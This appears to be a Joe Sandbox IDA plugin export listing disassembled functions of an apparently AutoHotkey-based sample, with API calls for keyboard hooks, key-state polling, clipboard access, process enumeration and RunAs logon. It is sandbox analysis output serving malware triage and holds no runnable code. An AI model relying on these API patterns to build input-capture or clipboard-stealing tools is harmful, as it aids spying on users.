Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0045E0DA, Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 251window

APIs

Part of subcall function 00473B50: LoadLibraryA.KERNEL32(uxtheme), ref: 00473B5C
Part of subcall function 00473B50: GetProcAddress.KERNEL32(00000000,SetWindowTheme,?,?), ref: 00473B6E
Part of subcall function 00473B50: FreeLibrary.KERNEL32(00000000,?,?), ref: 00473B8C

CreateWindowExA.USER32(?,SysListView32,004987E9,?,?,?,?,?,?,?,00400000,00000000), ref: 0045E141
InvalidateRect.USER32(00000013,?,00000000), ref: 0045F42F

Part of subcall function 00484959: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0048499E

DestroyWindow.USER32(00000000), ref: 0045E169
SendMessageA.USER32(?,0000108E,00000004,00000000), ref: 0045E1D0
SendMessageA.USER32(?,00001036,00000000,?), ref: 0045E1E6

Part of subcall function 004666E0: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004666FC
Part of subcall function 004666E0: SendMessageA.USER32(?,0000102F,00000000,00000000), ref: 00466710
Part of subcall function 004666E0: SendMessageA.USER32(?,00001024,00000000,?), ref: 0046673F
Part of subcall function 004666E0: GetSysColor.USER32(00000005), ref: 00466753
Part of subcall function 004666E0: SendMessageA.USER32(?,00001026,00000000,?), ref: 00466766
Part of subcall function 004666E0: SendMessageA.USER32(?,00001001,00000000,?), ref: 00466773
Part of subcall function 004666E0: InvalidateRect.USER32(00000000,00000000,00000001), ref: 0046677C

SendMessageA.USER32(?,00000030,?,?), ref: 0045E227
GetDC.USER32(?), ref: 0045E251
SelectObject.GDI32(00000000,?), ref: 0045E26F
GetTextMetricsA.GDI32(?,?), ref: 0045E282
SendMessageA.USER32(?,00001033,00000000,00000000), ref: 0045E2A3
GetSystemMetrics.USER32(0000000C), ref: 0045E2F9
GetSystemMetrics.USER32(00000032), ref: 0045E329
SendMessageA.USER32(?,00001033,00000000,00000000), ref: 0045E370
SendMessageA.USER32(?,00001040,?,000000FF), ref: 0045E3C7
MoveWindow.USER32(?,?,?,?,-00000004,00000001), ref: 0045E3F5
SelectObject.GDI32(?,?), ref: 0045E6AA
ReleaseDC.USER32(?,?), ref: 0045E6B5
SendMessageA.USER32(?,00000030,?,?), ref: 0045F28C
SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0045F2A6
GetClientRect.USER32(?,?), ref: 0045F2EF
SetWindowLongA.USER32(?,000000F0,?), ref: 0045F319
SendMessageA.USER32(?,00001328,00000001,?), ref: 0045F32F
SetWindowLongA.USER32(?,000000F0,?), ref: 0045F344
MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0045F378
GetWindowRect.USER32(?,?), ref: 0045F38E
SendMessageA.USER32(?,00000194,?,00000000), ref: 0045F3E7
GetWindowRect.USER32(?,?), ref: 0045F40B
MapWindowPoints.USER32(00000000,00000013,?,00000002), ref: 0045F41E
SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,00000013), ref: 0045F44C

Part of subcall function 00466470: CheckRadioButton.USER32(00000006,?,?,-00000004), ref: 004664A8
Part of subcall function 00466470: SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 004664F5
Part of subcall function 00466470: GetWindowLongA.USER32(00000000,000000F0), ref: 00466502
Part of subcall function 00466470: SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 00466511

Part of subcall function 00473E10: __ultow.LIBCMT ref: 00473E22

SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 0045F462

Part of subcall function 00462640: SendMessageA.USER32(?,00001304,00000000,00000000), ref: 0046267E
Part of subcall function 00462640: GetWindowLongA.USER32(?,000000F0), ref: 004626AD
Part of subcall function 00462640: SendMessageA.USER32(?,?,00000000,?), ref: 00462736
Part of subcall function 00462640: SendMessageA.USER32(?,0000101B,?,?), ref: 00462771
Part of subcall function 00462640: SendMessageA.USER32(?,?,00000000,00000000), ref: 004627CD
Part of subcall function 00462640: SendMessageA.USER32(?,0000108F,00000000,00000000), ref: 00462803
Part of subcall function 00462640: GetWindowLongA.USER32(?,000000F0), ref: 0046280A
Part of subcall function 00462640: SendMessageA.USER32(?,0000101E,00000000,0000FFFE), ref: 0046282E
Part of subcall function 00462640: SendMessageA.USER32(?,0000130C,?,00000000), ref: 00462850
Part of subcall function 00462640: SendMessageA.USER32(?,0000014E,00000001,?), ref: 0046286E
Part of subcall function 00462640: SendMessageA.USER32(0000014E,0000014E,?,00000000), ref: 00462880

Strings

SysListView32, xrefs: 0045E13B
Can't create control., xrefs: 0045E6CA

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00408970, Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 169threadwindowsleep

APIs

CreateThread.KERNEL32(00000000,00002000,00408C80,00000000,00000000,004A9108), ref: 004089CA
SetThreadPriority.KERNEL32(00000000,0000000F), ref: 004089E0
PostThreadMessageA.USER32(00000000,00000417,?,00000000), ref: 00408A04
Sleep.KERNEL32(0000000A), ref: 00408A10
GetTickCount.KERNEL32 ref: 00408A27
PeekMessageA.USER32(?,00000000,00000417,00000417,00000001), ref: 00408A4A
CreateMutexA.KERNEL32(00000000,00000000,AHK Keybd), ref: 00408AC5
GetExitCodeThread.KERNEL32(00000000,?), ref: 00408ADA
GetTickCount.KERNEL32 ref: 00408AEA
Sleep.KERNEL32(00000000), ref: 00408AF7
CloseHandle.KERNEL32(00000000), ref: 00408B0F
CloseHandle.KERNEL32(00000000), ref: 00408B2F
CreateMutexA.KERNEL32(00000000,00000000,AHK Mouse), ref: 00408B54
CloseHandle.KERNEL32(00000000), ref: 00408B6B

Strings

Warning: The keyboard and/or mouse hook could not be activated; some parts of the script will not function., xrefs: 00408B8F
AHK Mouse, xrefs: 00408B4B
AHK Keybd, xrefs: 00408ABC

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00473980, Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 168window

APIs

GetIconInfo.USER32(?,?), ref: 00473991
GetObjectA.GDI32(?,00000018,?), ref: 004739B6
CreateCompatibleDC.GDI32(00000000), ref: 004739CC
CreateDIBSection.GDI32(00000000,?,00000000,?,00000000,00000000), ref: 00473A20
SelectObject.GDI32(00000000,00000000), ref: 00473A33
DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000003), ref: 00473A57
GdiFlush.GDI32 ref: 00473A5D
GetDIBits.GDI32(?,00000000,00000000,?,?,00000028,00000000), ref: 00473A9E
SelectObject.GDI32(?,?), ref: 00473AD5
SelectObject.GDI32(?,?), ref: 00473AF6
DeleteObject.GDI32(00000000), ref: 00473B02
GetLastError.KERNEL32(?,00000000), ref: 00473B0F
DeleteDC.GDI32(00000000), ref: 00473B16
DeleteObject.GDI32(?), ref: 00473B26
DeleteObject.GDI32(00000000), ref: 00473B2C
DestroyCursor.USER32(00000000), ref: 00473B38

Strings

(, xrefs: 00473A0C

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0040E650, Relevance: 28.8, APIs: 19, Instructions: 272keyboardwindow

APIs

GetTickCount.KERNEL32 ref: 0040E6A8
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040E6CB
GetTickCount.KERNEL32(?,00000000), ref: 0040E6F5
GetAsyncKeyState.USER32(000000A0), ref: 0040E734
GetAsyncKeyState.USER32(000000A1), ref: 0040E747
GetAsyncKeyState.USER32(000000A2), ref: 0040E75B
GetAsyncKeyState.USER32(000000A3), ref: 0040E76F
GetAsyncKeyState.USER32(000000A4), ref: 0040E783
GetAsyncKeyState.USER32(000000A5), ref: 0040E797
GetAsyncKeyState.USER32(0000005B), ref: 0040E7A8
GetAsyncKeyState.USER32(0000005C), ref: 0040E7B9

Part of subcall function 0040FE10: GetSystemMetrics.USER32(00000017), ref: 0040FF0C
Part of subcall function 0040FE10: GetSystemMetrics.USER32(00000017), ref: 0040FF2E
Part of subcall function 0040FE10: GetCursorPos.USER32(?), ref: 0040FF8B
Part of subcall function 0040FE10: WindowFromPoint.USER32(?,?), ref: 0040FF9B
Part of subcall function 0040FE10: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040FFBB
Part of subcall function 0040FE10: SendMessageA.USER32(00000000,00000084,00000000,?), ref: 0040FFE5
Part of subcall function 0040FE10: mouse_event.USER32(?,?,?,00000000,FFC3D44D), ref: 00410138
Part of subcall function 0040FE10: mouse_event.USER32(?,?,?,00000000,FFC3D44D), ref: 004101A4

Part of subcall function 0040EEC0: GetCurrentThreadId.KERNEL32(?,?,?), ref: 0040EEEC
Part of subcall function 0040EEC0: GetKeyboardState.USER32(?), ref: 0040EFB6
Part of subcall function 0040EEC0: SetKeyboardState.USER32(?), ref: 0040F055
Part of subcall function 0040EEC0: PostMessageA.USER32(00000000,00000100,00000000,?), ref: 0040F081
Part of subcall function 0040EEC0: PostMessageA.USER32(00000000,00000101,00000000,?), ref: 0040F0BE
Part of subcall function 0040EEC0: GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040F10E
Part of subcall function 0040EEC0: GetProcAddress.KERNEL32(00000000), ref: 0040F115
Part of subcall function 0040EEC0: GetForegroundWindow.USER32 ref: 0040F189
Part of subcall function 0040EEC0: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040F196
Part of subcall function 0040EEC0: GetKeyboardLayout.USER32(00000000), ref: 0040F1A1
Part of subcall function 0040EEC0: GetAsyncKeyState.USER32 ref: 0040F1CC
Part of subcall function 0040EEC0: keybd_event.USER32(00000000,?,?,00000000), ref: 0040F297
Part of subcall function 0040EEC0: GetAsyncKeyState.USER32(?), ref: 0040F2E2
Part of subcall function 0040EEC0: keybd_event.USER32(00000000,?,00000002,00000000), ref: 0040F3C2
Part of subcall function 0040EEC0: GetAsyncKeyState.USER32(?), ref: 0040F3FD
Part of subcall function 0040EEC0: GetModuleHandleA.KERNEL32(user32,BlockInput), ref: 0040F476
Part of subcall function 0040EEC0: GetProcAddress.KERNEL32(00000000), ref: 0040F47D

GetAsyncKeyState.USER32(000000A0), ref: 0040E8DE
GetAsyncKeyState.USER32(000000A1), ref: 0040E8F1
GetAsyncKeyState.USER32(000000A2), ref: 0040E905
GetAsyncKeyState.USER32(000000A3), ref: 0040E919
GetAsyncKeyState.USER32(000000A4), ref: 0040E92D
GetAsyncKeyState.USER32(000000A5), ref: 0040E941
GetAsyncKeyState.USER32(0000005B), ref: 0040E952
GetAsyncKeyState.USER32(0000005C), ref: 0040E963

Part of subcall function 00410D40: GetWindowThreadProcessId.USER32(?,00000000), ref: 00411409

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00474110, Relevance: 28.3, APIs: 14, Strings: 2, Instructions: 258clipboard

APIs

Part of subcall function 00404620: GetTickCount.KERNEL32(761C44CF,00000000,00000000,004040C7,004AC8E0,?,004987E9,00401033,?,?,0046A420,00000000,?,00000005,?,00000000), ref: 0040463B
Part of subcall function 00404620: OpenClipboard.USER32(000601DA), ref: 0040464C
Part of subcall function 00404620: GetTickCount.KERNEL32(?,004987E9,00401033,?,?,0046A420,00000000,?,00000005,?,00000000,?), ref: 00404660
Part of subcall function 00404620: OpenClipboard.USER32(000601DA), ref: 0040469A

EnumClipboardFormats.USER32(00000000), ref: 00474152
GlobalSize.KERNEL32(00000000), ref: 00474191
EnumClipboardFormats.USER32(00000000), ref: 004741D3
GlobalUnWire.KERNEL32(00000000), ref: 004741F8
CloseClipboard.USER32 ref: 00474204

Part of subcall function 00484959: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0048499E

GlobalUnWire.KERNEL32(00000000), ref: 0047429A
CloseClipboard.USER32 ref: 004742A6
EnumClipboardFormats.USER32 ref: 004742EC

Part of subcall function 00404520: GetClipboardFormatNameA.USER32(-0000000F,00000104,00000104), ref: 0040454C
Part of subcall function 00404520: __Stoull.NTSTC_LIBCMT ref: 0040455E
Part of subcall function 00404520: GetClipboardData.USER32(-0000000F), ref: 00404604

GlobalSize.KERNEL32(00000000), ref: 0047434B
GlobalFix.KERNEL32(00000000), ref: 00474358
GlobalUnWire.KERNEL32(00000000), ref: 004743AC
EnumClipboardFormats.USER32(00000000), ref: 004743BD
GlobalUnWire.KERNEL32(00000000), ref: 004743E1
CloseClipboard.USER32 ref: 004743F1

Strings

Out of memory., xrefs: 004742CB
Can't open clipboard for reading., xrefs: 00474126

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00444B50, Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 156library

APIs

GetModuleHandleA.KERNEL32(user32,?,?,?,000000EC), ref: 00444B77
GetModuleHandleA.KERNEL32(kernel32,?,000000EC), ref: 00444B83
GetModuleHandleA.KERNEL32(comctl32,?,000000EC), ref: 00444B8F
GetModuleHandleA.KERNEL32(gdi32,?,000000EC), ref: 00444B9B
_strncpy.LIBCMT ref: 00444BB4
GetProcAddress.KERNEL32(00000000,?,00000206,?,?,?,000000EC), ref: 00444BEC
GetProcAddress.KERNEL32(?,?,00000206,?,?,?,000000EC), ref: 00444C33
GetModuleHandleA.KERNEL32(?,00000206,?,?,?,000000EC), ref: 00444C5A
LoadLibraryA.KERNEL32(?), ref: 00444C72
GetProcAddress.KERNEL32(00000000,00000001,?,000000EC), ref: 00444CA1
GetProcAddress.KERNEL32(00000000,00000001,?,000000EC), ref: 00444CC4

Strings

comctl32, xrefs: 00444B85
user32, xrefs: 00444B72
kernel32, xrefs: 00444B79
gdi32, xrefs: 00444B91
DllCall, xrefs: 00444C80, 00444D15

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00476690, Relevance: 26.6, APIs: 10, Strings: 5, Instructions: 341

APIs

__Stoull.NTSTC_LIBCMT ref: 00476741

Part of subcall function 00485220: __mbsnbicmp_l.LIBCMT ref: 00485230

Part of subcall function 00485EC9: __isxdigit_l.LIBCMT ref: 00485EF0

IsWindow.USER32(00000000), ref: 004767D4
__Stoull.NTSTC_LIBCMT ref: 004767FF
__Stoull.NTSTC_LIBCMT ref: 00476858
_strncpy.LIBCMT ref: 0047688A
__Stoull.NTSTC_LIBCMT ref: 004768F9
__Stoull.NTSTC_LIBCMT ref: 0047691B
_strncpy.LIBCMT ref: 0047694B
_strncpy.LIBCMT ref: 00476A10
_strncpy.LIBCMT ref: 00476A75

Part of subcall function 00476AD0: GetWindowTextA.USER32(?,?,00007FFF), ref: 00476B06
Part of subcall function 00476AD0: GetWindowThreadProcessId.USER32(?,?), ref: 00476B2B
Part of subcall function 00476AD0: GetWindowThreadProcessId.USER32(?,?), ref: 00476B3E
Part of subcall function 00476AD0: GetClassNameA.USER32(?,?,00000101), ref: 00476B81

Strings

ahk_, xrefs: 004766FB, 00476950, 00476981, 00476A3C
class, xrefs: 00476915
exe, xrefs: 004768F3
group, xrefs: 00476852
pid, xrefs: 004767F9

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0044E300, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 151library

APIs

OpenProcess.KERNEL32(00000410,00000000,?,7619EDFA,?,?,00000000), ref: 0044E31F
OpenProcess.KERNEL32(00001000,00000000,?), ref: 0044E32E
GetModuleBaseNameA.PSAPI(00000000,00000000,?,00000104), ref: 0044E354
GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 0044E35C
GetModuleHandleA.KERNEL32(psapi,GetProcessImageFileNameA), ref: 0044E37E
GetProcAddress.KERNEL32(00000000), ref: 0044E385
CloseHandle.KERNEL32(00000000), ref: 0044E3F6
QueryDosDeviceA.KERNEL32(?,?,00000104), ref: 0044E424
__Stoull.NTSTC_LIBCMT ref: 0044E43B
CloseHandle.KERNEL32(00000000), ref: 0044E45C
CloseHandle.KERNEL32(00000000), ref: 0044E495

Strings

:, xrefs: 0044E409
psapi, xrefs: 0044E379
A, xrefs: 0044E410
GetProcessImageFileNameA, xrefs: 0044E374

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004744C0, Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136clipboard

APIs

Part of subcall function 00404620: GetTickCount.KERNEL32(761C44CF,00000000,00000000,004040C7,004AC8E0,?,004987E9,00401033,?,?,0046A420,00000000,?,00000005,?,00000000), ref: 0040463B
Part of subcall function 00404620: OpenClipboard.USER32(000601DA), ref: 0040464C
Part of subcall function 00404620: GetTickCount.KERNEL32(?,004987E9,00401033,?,?,0046A420,00000000,?,00000005,?,00000000,?), ref: 00404660
Part of subcall function 00404620: OpenClipboard.USER32(000601DA), ref: 0040469A

EmptyClipboard.USER32 ref: 004744F0
GlobalUnWire.KERNEL32(00000000), ref: 00474522
CloseClipboard.USER32 ref: 0047452E
GlobalAlloc.KERNEL32(00000042,00000000), ref: 0047457E
GlobalFix.KERNEL32(00000000), ref: 0047458F
GlobalUnWire.KERNEL32(00000000), ref: 004745A9
SetClipboardData.USER32(?,00000000), ref: 004745B7
GlobalUnWire.KERNEL32(00000000), ref: 004745E3
CloseClipboard.USER32 ref: 004745F3
GlobalFree.KERNEL32(00000000), ref: 00474622
GlobalUnWire.KERNEL32(00000000), ref: 00474641
CloseClipboard.USER32 ref: 0047464D

Strings

Can't open clipboard for writing., xrefs: 004744D9
Out of memory., xrefs: 0047460A
GlobalLock, xrefs: 00474664

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0044EF00, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 157library

APIs

LoadLibraryA.KERNEL32(advapi32), ref: 0044EF17
GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW,?,?,?,?,0042E58B,?,?,?,?,00000000,00000000,?,?), ref: 0044EF52
FreeLibrary.KERNEL32(00000000,?,?,?,?,0042E58B,?,?,?,?,00000000,00000000,?,?), ref: 0044EF61
MultiByteToWideChar.KERNEL32 ref: 0044EFDF
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 0044EFFB
CloseHandle.KERNEL32(?), ref: 0044F09A
GetLastError.KERNEL32 ref: 0044F0C1
FreeLibrary.KERNEL32(00000000), ref: 0044F0D1

Strings

advapi32, xrefs: 0044EF0E
RunAs: Missing advapi32.dll., xrefs: 0044EF33
D, xrefs: 0044EFCA
CreateProcessWithLogonW, xrefs: 0044EF4C
CreateProcessWithLogonW., xrefs: 0044EF77

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0045B2DA, Relevance: 22.7, APIs: 15, Instructions: 201window

APIs

Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0

MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0045B341
MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0045B365
MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0045B389
MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0045B3AD
GetWindowRect.USER32(?,?), ref: 0045B3C7
ScreenToClient.USER32(?,?), ref: 0045B3E6
MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0045B443
SendMessageA.USER32(00000000,00000421,00000001,00000000), ref: 0045B46A
SendMessageA.USER32(?,00000421,00000000,00000000), ref: 0045B47B
SendMessageA.USER32(?,00000420,00000001,00000000), ref: 0045B48F
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0045B496
SendMessageA.USER32(00000000,00000420,00000000,00000000), ref: 0045B4AC
InvalidateRect.USER32(00000000,00000000,00000001), ref: 0045B4B3
GetWindowRect.USER32(?,?), ref: 0045B4CD
MapWindowPoints.USER32(00000000,00000011,?,00000002), ref: 0045B4E4

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0045BFA0, Relevance: 22.7, APIs: 15, Instructions: 194window

APIs

SendMessageA.USER32(?,00000406,00000000,00000000), ref: 0045BFF3
SendMessageA.USER32(?,00000414,00000000,00000000), ref: 0045C00C
DestroyCursor.USER32(00000000), ref: 0045C013
IsWindow.USER32(00000000), ref: 0045C022
ShowWindow.USER32(00000000,00000000), ref: 0045C032
SetMenu.USER32(00000000,00000000), ref: 0045C03E
DestroyWindow.USER32(00000000), ref: 0045C058
DeleteObject.GDI32(?), ref: 0045C09F
DeleteObject.GDI32(?), ref: 0045C0B3
DragFinish.SHELL32(?,?,004AA69C,77535F14,7619A747,00414D61,?,?,?,?,?,00000000,00000000), ref: 0045C0C7
DestroyCursor.USER32(?), ref: 0045C0FB
DeleteObject.GDI32(?), ref: 0045C103
DestroyCursor.USER32(?), ref: 0045C17A
DestroyCursor.USER32(?), ref: 0045C17D
DestroyAcceleratorTable.USER32(?), ref: 0045C187

Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004555F0, Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 294

APIs

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00455802

Part of subcall function 00455A20: SafeArrayGetDim.OLEAUT32(?), ref: 00455A2D
Part of subcall function 00455A20: SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00455A4B
Part of subcall function 00455A20: SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00455A65
Part of subcall function 00455A20: SafeArrayAccessData.OLEAUT32(?,?), ref: 00455A7D
Part of subcall function 00455A20: SafeArrayGetElemsize.OLEAUT32(?), ref: 00455AA1
Part of subcall function 00455A20: SafeArrayUnaccessData.OLEAUT32(?), ref: 00455B10

SafeArrayCopy.OLEAUT32(?,?), ref: 004556E9

Part of subcall function 00486A00: std::exception::exception.LIBCMT ref: 00486A4F

SafeArrayDestroy.OLEAUT32(?), ref: 00455744
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0045577F

Part of subcall function 00454D50: FormatMessageA.KERNEL32(00001200,00000000,?,00000000,?,00001000,00000000), ref: 00454DD1
Part of subcall function 00454D50: _vswprintf_s.LIBCMT ref: 00454E02
Part of subcall function 00454D50: SysFreeString.OLEAUT32(?), ref: 00454E32
Part of subcall function 00454D50: SysFreeString.OLEAUT32(00000000), ref: 00454E38
Part of subcall function 00454D50: SysFreeString.OLEAUT32(?), ref: 00454E3E

SafeArrayGetDim.OLEAUT32(?), ref: 00455815
SafeArrayLock.OLEAUT32(?), ref: 004558B8
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004558C9

Part of subcall function 00454B90: VariantClear.OLEAUT32 ref: 00454BA1
Part of subcall function 00454B90: VariantChangeType.OLEAUT32(?,?,00000000), ref: 00454C00
Part of subcall function 00454B90: VariantClear.OLEAUT32(?), ref: 00454C11
Part of subcall function 00454B90: SysFreeString.OLEAUT32 ref: 00454C33

Part of subcall function 00454C70: VariantCopyInd.OLEAUT32(?,?), ref: 00454C9B

SafeArrayUnaccessData.OLEAUT32(?), ref: 00455939

Strings

NewEnum, xrefs: 00455687
MaxIndex, xrefs: 0045574C
MinIndex, xrefs: 004557CF
Clone, xrefs: 004556D1

Memory Dump Source

